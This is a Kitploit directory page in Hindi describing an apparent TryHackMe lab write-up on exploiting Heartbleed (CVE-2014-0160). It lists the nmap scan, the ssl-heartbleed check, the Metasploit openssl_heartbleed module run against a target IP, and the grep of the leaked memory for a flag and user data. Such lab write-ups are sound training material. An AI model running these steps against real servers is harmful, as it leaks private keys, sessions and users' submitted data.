Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Project-Field-Analysis-and-Memory-Leak-Demonstration — इस परियोजना का उद्देश्य Heartbleed भेद्यता (CVE-2014-0160) के लिए एक दूरस्थ होस्ट का आकलन करना, इसकी उपस्थिति की पुष्टि करना, और TLS प्रोटोकॉल के माध्यम से सर्वर मेमोरी से संभावित संवेदनशील जानकारी निकालने के लिए इसका शोषण करना था। | Kitploit
उपकरण/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
मेमोरी फोरेंसिकभेद्यता विश्लेषणशोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

इस परियोजना का उद्देश्य Heartbleed भेद्यता (CVE-2014-0160) के लिए एक दूरस्थ होस्ट का आकलन करना, इसकी उपस्थिति की पुष्टि करना, और TLS प्रोटोकॉल के माध्यम से सर्वर मेमोरी से संभावित संवेदनशील जानकारी निकालने के लिए इसका शोषण करना था।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
151 साल पहलेअभी तक समीक्षित नहीं

उद्देश्य इस परियोजना का उद्देश्य किसी दूरस्थ होस्ट पर Heartbleed भेद्यता (CVE-2014-0160) का आकलन करना, इसकी उपस्थिति की पुष्टि करना, और TLS प्रोटोकॉल के माध्यम से सर्वर मेमोरी से संभावित संवेदनशील जानकारी निकालने के लिए इसका शोषण करना था।

निष्पादन

  1. खुले सेवाओं की पहचान (Nmap) nmap -sC -sV 52.215.184.158 परिणाम:

plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7

| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 TLS प्रमाणपत्र स्व-हस्ताक्षरित और समाप्त था। इससे संदेह उत्पन्न हुआ कि OpenSSL संस्करण पुराना हो सकता है। लक्ष्य पोर्ट: 443।

  1. Heartbleed भेद्यता जाँच (Nmap स्क्रिप्ट) nmap -p 443 --script ssl-heartbleed 52.215.184.158 परिणाम:

plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 लक्ष्य Heartbleed के प्रति संवेदनशील पुष्टि हुआ।

  1. शोषण (Metasploit Framework) msfconsole use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 52.215.184.158 run परिणाम:

plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin मेमोरी सफलतापूर्वक डंप की गई और विश्लेषण के लिए स्थानीय रूप से संग्रहीत की गई।

  1. मेमोरी डंप का विश्लेषण

strings openssl.heartble_152689.bin | grep -i "THM{" परिणाम:

plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} गोपनीय डेटा, जिसमें एक एप्लिकेशन फ्लैग शामिल है, TLS मेमोरी से सफलतापूर्वक निकाला गया — यह पुष्टि करता है कि भेद्यता का वास्तविक रूप से शोषण करके संवेदनशील जानकारी लीक की जा सकती है।

निष्कर्ष मैंने दूरस्थ सर्वर पर CVE-2014-0160 को सफलतापूर्वक पहचाना और उसका शोषण किया। इस प्रक्रिया में शामिल थे:

nmap के साथ भेद्यता का पता लगाना

Metasploit का उपयोग करके दोष का शोषण करना

मेमोरी से लाइव उपयोगकर्ता-प्रस्तुत डेटा (फ्लैग THM{sSl-Is-BaD} सहित) निकालना

व्यावसायिक प्रभाव सार्वजनिक रूप से उजागर सिस्टम में Heartbleed की उपस्थिति एक गंभीर जोखिम उत्पन्न करती है:

TLS निजी कुंजियों का संभावित रिसाव

सत्र अपहरण

उपयोगकर्ता नाम, ईमेल और संवेदनशील उपयोगकर्ता इनपुट का उजागर होना

टूल डाउनलोड करें